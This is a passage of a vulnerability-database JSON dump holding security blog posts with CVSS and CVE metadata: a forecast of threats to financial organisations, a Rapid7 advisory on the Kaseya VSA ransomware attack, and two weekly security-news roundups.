they are safe? 
\nIn the scramble for cryptocurrency investment opportunities, we believe that cybercriminals will take advantage by fabricating and selling rogue devices with backdoors, followed by social engineering campaigns and other methods to steal victims' financial assets.\n\n * **Targeted ransomware – more targeted and more regional**\n\nWith the [international efforts](<https://www.interpol.int/en/News-and-Events/News/2021/Joint-global-ransomware-operation-sees-arrests-and-criminal-network-dismantled>) to crack down on major targeted ransomware groups, we will see a rise in small regionally derived groups focused on regional victims. \n\n * **The adoption of Open Banking in more countries may lead to more opportunities for cyberattacks**\n\nThe UK was the pioneer, but nowadays [many countries are adopting](<https://www.penser.co.uk/digital-banking/open-banking-in-countries-other-than-the-uk/>) it. As most Open Banking systems are based on APIs and Web API queries performed by financial institutions, we can expect more attacks against them, [as pointed out by Gartner](<https://www.darkreading.com/threat-intelligence/cybercriminals-ramp-up-attacks-on-web-apis>): "in 2022, API abuses will move from an infrequent to the most frequent attack vector, resulting in data breaches for enterprise web applications."\n\n * **Mobile banking Trojans on the rise**\n\nAs [mobile banking experienced booming adoption](<https://www.forbes.com/sites/johnkoetsier/2020/04/15/report-35-85-fintech-growth-on-mobile-thanks-to-coronavirus-after-1-trillion-app-opens-in-2019/?sh=1399567b759a>) worldwide due to the pandemic (in Brazil it represented 51% of all transactions in 2020), we can expect more mobile banking Trojans for Android, especially RATs that can bypass security measures adopted by banks (such as OTP and MFA). Regional Android implant projects will move globally, exporting attacks to Western European countries. 
\n\n * **Rise of threats to online payment systems**\n\nAmid the pandemic, many companies have gone digital and moved their systems online. And the longer people stay at home because of quarantine and lockdowns, the more they rely on online markets and payment systems. However, this rapid shift is not accompanied by the appropriate security measures, and it is attracting lots of cybercriminals. This issue is particularly severe in developing countries, and the symptoms will last for a while.\n\n * **With more fintech apps out there, the increasing volume of financial data is attracting cybercriminals**\n\nThanks to online payment systems and fintech applications, lots of important personal information is stored on mobile. Many cybercrime groups will continue to attack personal mobile phones with evolved strategies such as deep fake technology and advanced malware to steal victims' data.\n\n * **Remote workers using corporate computers for entertainment purposes, such as online games, continue to pose financial threats to organizations**\n\nIn 2020, the number of gamers surpassed 2.7 billion, with the Asia-Pacific becoming the most active region. While video game platforms such as Steam reached all-time highs during April and May 2020, this year Steam peaked at 27 million concurrent players in March. In our [Do cybercriminals play cyber games during quarantine?](<https://securelist.com/do-cybercriminals-play-cyber-games-during-quarantine/97241/>) article, we wrote that users relied on corporate laptops to play video games, watch movies and use e-learning platforms. This behavior was easy to identify because there was a boom in the Intel and AMD mobile graphics card market in 2020-2021 compared to previous years. This trend is here to stay, and while during 2020, 46% of employees had never worked remotely before, now two-thirds of them state they wouldn't go back to an office, with the rest claiming to have a shorter office work week. 
\nCybercriminals spread malware and steal logins, in-game items, payment information and more through the use of video games such as Minecraft or Counter-Strike: Global Offensive. In addition, Hollywood blockbuster movies have become the perfect lure for those desperate to watch a film before it's released, and all from the comfort of their own homes. That was the case with the latest James Bond film, No Time to Die, with cybercriminals using adware, Trojans and ransomware to steal private information and even blackmailing victims who wanted their data back.\n\n * **ATM and PoS malware to return with a vengeance**\n\nDuring the pandemic, some locations saw PoS/ATM transaction levels drop significantly. Lockdowns forced people to stay at home and make purchases online, and this was mirrored in PoS/ATM malware too. As restrictions are lifted, we should expect the return of known PoS/ATM malware projects and the appearance of new projects. Cybercriminals will regain their easy physical access to ATMs and PoS devices at the same time as customers of retailers and financial institutions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T10:00:13", "type": "securelist", "title": "Cyberthreats to financial organizations in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5544", "CVE-2020-3992", "CVE-2021-3007", "CVE-2021-30116", "CVE-2021-42258"], "modified": "2021-11-23T10:00:13", "id": "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "href": "https://securelist.com/cyberthreats-to-financial-organizations-in-2022/104974/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-13T17:08:07", "description": "\n\nRapid7 is aware of and tracking all information surrounding a coordinated, mass ransomware attack reported to be affecting hundreds of organizations. Huntress Labs is maintaining a public [Reddit thread](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) documenting the scope and triage of an event that has, as of the original post date (see updates below), stemmed from 8 managed service providers. Rapid7 does not use Kaseya or a Kaseya MSP and we are not affected by this mass ransomware attack.\n\nRapid7 is updating this post as more information becomes available. Core information is below the most recent updates.\n\n### 2021-07-13\n\n * CISA has [updated their Kaseya ransomware event guidance](<https://us-cert.cisa.gov/kaseya-ransomware-attack>) for affected managed service providers and their customers.\n\n### 2021-07-11\n\n * In a video post today, Kaseya [has indicated](<https://videos.sproutvideo.com/embed/d39ddab51e14efc25a/50fb34477e68d73c?type=hd>) that they are still planning to go ahead with re-enabling an updated VSA SaaS and rollout of the on-prem VSA server update. 
Some runbook instructions have changed, so any organization planning on going live today should [review those changes](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) to see if they impact your environment.\n\n### 2021-07-09\n\n * The Dutch Institute for Vulnerability Disclosure (DIVD) [published](<https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/>) more information on the specific vulnerabilities they shared with Kaseya: \n * [CVE-2021-30116](<https://attackerkb.com/search?q=CVE-2021-30116>) \\- A credentials leak and business logic flaw, resolution in progress. [CVSS 10]\n * [CVE-2021-30117](<https://attackerkb.com/search?q=CVE-2021-30117>) \\- An SQL injection vulnerability, resolved in May 8th patch. [CVSS 9.8]\n * [CVE-2021-30118](<https://attackerkb.com/search?q=CVE-2021-30118>) \\- A Remote Code Execution vulnerability, resolved in April 10th patch. (v9.5.6) [CVSS 9.8]\n * [CVE-2021-30119](<https://attackerkb.com/search?q=CVE-2021-30119>) \\- A Cross Site Scripting vulnerability, resolution in progress. [CVSS 5.4]\n * [CVE-2021-30120](<https://attackerkb.com/search?q=CVE-2021-30120>) \\- 2FA bypass, resolution in progress. [CVSS 9.9]\n * [CVE-2021-30121](<https://attackerkb.com/search?q=CVE-2021-30121>) \\- A Local File Inclusion vulnerability, resolved in May 8th patch. [CVSS 6.5]\n * [CVE-2021-30201](<https://attackerkb.com/search?q=CVE-2021-30201>) \\- An XML External Entity vulnerability, resolved in May 8th patch. 
[CVSS 7.5]\n * President Biden [urged Vladimir Putin](<https://www.nytimes.com/2021/07/09/us/politics/putin-biden-ransomware-hackers.html?referringSource=articleShare>) to \u2018take action to disrupt\u2019 Russia-based hackers behind ransomware attacks.\n\n### 2021-07-08\n\n * Kaseya has [posted a video from their CEO](<https://videos.sproutvideo.com/embed/119ddab21e19e0cd98/19739709ce717d3b?type=hd>) notifying customers that patches and VSA SaaS will likely be available this coming Sunday afternoon (July 11, 2021).\n * According to Malwarebytes, some threat actors [are capitalizing on the extended response to the Kaseya mass ransomware attack](<https://twitter.com/MBThreatIntel/status/1412518446013812737?s=20>) and are targeting victims via email with fake patches that push Cobalt Strike payloads.\n\n### 2021-07-07\n\n * Kaseya has posted runbooks for [on premises VSAs](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) with steps on how to prepare VSA servers for the forthcoming patch. These details include the installation of FireEye's agent software along with details on how to isolate the server from production networks, and [SaaS customers](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) for how to prepare for the SaaS VSAs coming back online.\n\n### 2021-07-06\n\n * In a [statement posted late Monday night](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>), Kaseya provided an update on their assessment of the impact of the attack: _"we are aware of fewer than 60 Kaseya customers, all of whom were using the VSA on-premises product, who were directly compromised by this attack. While many of these customers provide IT services to multiple other companies, we understand the total impact thus far has been to fewer than 1,500 downstream businesses. 
We have not found evidence that any of our SaaS customers were compromised._\n * The Compromise Detection Tool, which was originally only provided directly to customers, [has been made public](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>). The tool searches for indicators of compromise, evidence of data encryption, and the REvil ransom note.\n * Kaseya also stated that \u2014 based on advice by outside experts \u2014 customers who experienced ransomware and receive communication from the attackers _should not click on any links as they may be weaponized_.\n\n### 2021-07-05\n\n * Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger [issued a statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/04/statement-by-deputy-national-security-advisor-for-cyber-and-emerging-technology-anne-neuberger-on-reporting-kaseya-compromises/>) noting that the President has directed the full resources of the government to investigate this incident and urged anyone who believes their systems have been compromised in the Kaseya ransomware incident to immediately report to the Internet Crime Complaint Center at <https://www.IC3.gov>.\n * The Associated Press [is reporting](<https://apnews.com/article/joe-biden-europe-government-and-politics-technology-business-fc0df4c42f8cd6148bf936ca24bb5cbe>) that REvil has offered a blanket decryption for all victims of the Kaseya attack in exchange for $70 million.\n * Incident responders across multiple firms are indicating the number of victim organizations is in the thousands, spanning over 18 countries.\n\n### 2021-07-04\n\n * Cado Security published [resources](<https://www.cadosecurity.com/post/resources-for-dfir-professionals-responding-to-the-revil-ransomware-kaseya-supply-chain-attack>) which can aid responders as they triage their exposure to the mass ransomware incident.\n * CISA and the FBI have issued [guidance for MSPs and their 
customers](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) who have been affected by the Kaseya VSA supply-chain ransomware attack.\n\n### 2021-07-03 Update\n\n * The Washington Post has [a story with information on the ransom demands being made](<https://www.washingtonpost.com/technology/2021/07/02/kaseya-ransomware-attack/>)\n * The Dutch Institute for Vulnerability Disclosure (DIVD) [posted information](<https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/>) on their ongoing investigation and response to the Kaseya incident, which includes details on their efforts to identify and secure internet-facing VSA servers.\n * CISA posted an [initial advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>) and is taking action to understand and address the recent supply-chain ransomware attack.\n * Bloomberg [is reporting](<https://www.bloomberg.com/news/articles/2021-07-03/number-of-victims-continues-to-grow-in-massive-ransomware-attack>) that the attack (so far) spans over 1,000 organizations across 11 countries with numerous downstream impacts.\n\n### Original/Main Content\n\nEvidence points to a supply chain attack targeting Kaseya VSA patch management and monitoring software. 
Ransom notes suggest REvil is behind the coordinated attack.\n\nRapid7 Managed Detection and Response teams suggest that, out of an abundance of caution, organizations that use either an on-premise Kaseya VSA solution or the Kaseya cloud-based VSA solution perform the following steps immediately:\n\n * Disable or uninstall the Kaseya agent\n * If you host the Kaseya management server, shut down this system (Kaseya also strongly suggests this course of action)\n\nKaseya appears to be providing updates via their [public helpdesk page](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) and their [status page](<https://status.kaseya.net/>) provides visibility into the status of their hosted infrastructure.\n\nResearcher [@BushidoToken](<https://twitter.com/BushidoToken>) has provided a [link to a GitHub gist containing the REvil configuration dump](<https://twitter.com/BushidoToken/status/1411054457450811397>), which includes indicators of compromise that organizations may be able to use to detect evidence of these actors operating in their infrastructure.\n\n## Rapid7 Customers\n\n### Managed Detection and Response\n\nRapid7's Managed Detection and Response (MDR) team had existing attacker behavior detections that identified Kaseya-related ransomware activity beginning on Friday, July 2, 2021. Following the initial wave of alerts on Friday, July 2, MDR sent an email communication with a `Critical Advisory` to all MDR customers with guidance on disabling Kaseya and mitigating risk. We have conducted hunts across customer environments and deployed additional detections to accelerate identification of the threat. 
Affected customers have been notified.\n\n### InsightIDR\n\nRapid7 has deployed the following detections in InsightIDR for attacker behavior related to the Kaseya ransomware attack:\n\n * Attacker Technique - CertUtil With Decode Flag\n * Suspicious Process - Renamed CertUtil\n * Suspicious Process - Certutil Decodes Executable File\n * Attacker Tool - KWorking\\agent.exe", "cvss3": {}, "published": "2021-07-13T16:00:00", "type": "rapid7blog", "title": "Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-13T16:00:00", "id": "RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2", "href": "https://blog.rapid7.com/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). 
"The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." 
\nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. 
Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. 
I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere was some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. 
\n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! 
The third episode of Last Week\u2019s Security news, July 5 - July 11. There was a lot of news last week. Most of it was again about PrintNightmare and Kaseya.\n\nThe updates for PrintNightmare (CVE-2021-34527) [were finally released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) mid-week. It became possible not only to disable the service, but also to update the hosts. This is especially important for desktops that need to print something. But the problem is that these [patches can be bypassed](<https://twitter.com/wdormann/status/1412813044279910416>). "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE". Microsoft has updated their security update guide after that: "if you set this reg key to = 1 then the system is vulnerable by design". It seems that solving this problem requires hardening and registry monitoring.\n\nPrintNightmare exploitation just got easier. Rapid7 security [researchers have added a new module](<https://www.rapid7.com/blog/post/2021/07/09/metasploit-wrap-up-120/>) for PrintNightmare to Metasploit. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\\SYSTEM.\n\nThere was a lot of news regarding Kaseya. I would not say that in a week we learned something fundamentally new, but almost all guesses were confirmed. [7 CVEs that could be used in attacks became known](<https://www.rapid7.com/blog/post/2021/07/08/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) (CVE-2021-30116, CVE-2021-30117, CVE-2021-30118, CVE-2021-30119, CVE-2021-30120, CVE-2021-30121, CVE-2021-30201). 
Huntress Security Researcher [Caleb Stewart has successfully reproduced the Kaseya VSA exploits](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) used to deploy REvil/Sodinokibi ransomware and released a POC demonstration video depicting an Authentication Bypass, an Arbitrary File Upload and Command Injection. [Brian Krebs also wrote about a directory traversal](<https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/>) vulnerability (CVE-2015-2862) on the Customer Portal portal.kaseya.net that has not been fixed since 2015. The portal "was deprecated but left up". The Compromise Detection Tool has been made public. The ransomware operators have demanded $70m for a master decryption key. Some threat actors were targeting victims via email with fake patches that push Cobalt Strike payloads. [Kaseya delays SaaS restore to Sunday July 11](<https://www.theregister.com/2021/07/09/kaseya_saas_restoration_july_11/>) and promises \u201cexponentially more secure\u201d product. And if you think that only Kaseya has such problems, you are wrong.\n\nContinuing on the theme that the security problems of service providers are your problems. [Morgan Stanley has confirmed a data breach](<https://www.darkreading.com/attacks-breaches/morgan-stanley-discloses-data-breach-/d/d-id/1341503>) in which attackers were able to access personal information belonging to customers by targeting a vulnerability in the Accellion FTA server. Attackers were able to access participant data, including name, last known address, birth date, Social Security number, and corporate company name. The server belonged to Guidehouse, a vendor that provides account maintenance services to Morgan Stanley's StockPlan Connect business. While Guidehouse patched the vulnerability within five days of its availability, the attacker was able to access the data around that time, officials said. 
The vendor discovered the attack in March 2021 and learned it affected Morgan Stanley in May. As you can see, 5 days for patching a critical vulnerability at the perimeter is unacceptable.\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) [has released an analysis](<https://www.cisa.gov/publication/rva>) detailing the findings from Risk and Vulnerability Assessments (RVAs) conducted during the 2020 fiscal year across industries. The officials' analysis details a sample attack path an intruder could take to compromise an organization, with weaknesses that represent the ones CISA saw in RVAs over the past year. Quite interesting stuff, especially [the infographics](<https://www.cisa.gov/sites/default/files/publications/FY20_RVAs_Mapped_to_the_MITRE_ATTCK_Framework_508_corrected.pdf>). For example, it was especially interesting to see statistics on Initial Access. Phishing links were most common and used to gain initial access in 49% of RVAs. Next were exploits of public-facing applications (11.8%), followed by phishing attachments (9.8%). Therefore, if you focus on anti-phishing and perimeter control, you are building your first line of defense correctly.\n\n[North Korean APT Lazarus Group impersonates](<https://threatpost.com/lazarus-engineers-malicious-docs/167647/>) Airbus, General Motors and Rheinmetall to lure Job-Seeking Engineers into downloading malware. This is stated in a report published by AT&T Alien Labs. The ultimate payload of the Rheinmetall document uses Mavinject.exe, a legitimate Windows component that has been used and abused before in malware activity, to perform arbitrary code injections inside any running process. The Airbus document macro executes the payload with an updated technique. The attackers are no longer using Mavinject, but directly executing the payload with explorer.exe, significantly modifying the resulting execution tree. 
So, when you suddenly see interesting job offers in your inbox, be careful.\n\n[A set of high-severity privilege-escalation vulnerabilities](<https://threatpost.com/cisco-bpa-wsa-bugs-cyberattacks/167654/>) affecting Cisco\u2019s Business Process Automation (BPA) application and Web Security Appliance (WSA) could allow authenticated, remote attackers to access sensitive data or take over a targeted system. The fact that authentication is required makes it less interesting. In addition, these are apparently not the most popular Cisco products. But if you are using BPA or WSA, be aware.\n\n[Four security vulnerabilities](<https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html>) (CVE-2020-7388, CVE-2020-7389, CVE-2020-7387, CVE-2020-7390) have been uncovered in the Sage X3 enterprise resource planning (ERP) product, two of which could be chained together as part of an attack sequence to enable hackers to execute malicious commands and take control of vulnerable systems. Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required.\n\nMultiple security vulnerabilities have been [disclosed in Philips Clinical Collaboration](<https://thehackernews.com/2021/07/critical-flaws-reported-in-philips-vue.html>) Platform Portal (Vue PACS). Successful exploitation of these vulnerabilities could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, perform code execution, install unauthorized software, or affect system data integrity in such a way as to negatively impact the confidentiality, integrity, or availability of the system. Everything related to medicine requires the strictest certification. 
As you can see, it doesn't help much.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-11T20:52:51", "type": "avleonov", "title": "Last Week\u2019s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7388", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30201", "CVE-2020-7390", "CVE-2021-30119", "CVE-2020-7387", "CVE-2020-7389", "CVE-2021-34527", "CVE-2021-30116", "CVE-2015-2862", "CVE-2021-30121", "CVE-2021-30120"], "modified": "2021-07-11T20:52:51", "id": "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "href": "http://feedproxy.google.com/~r/avleonov/~3/L83_6PGWaZs/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}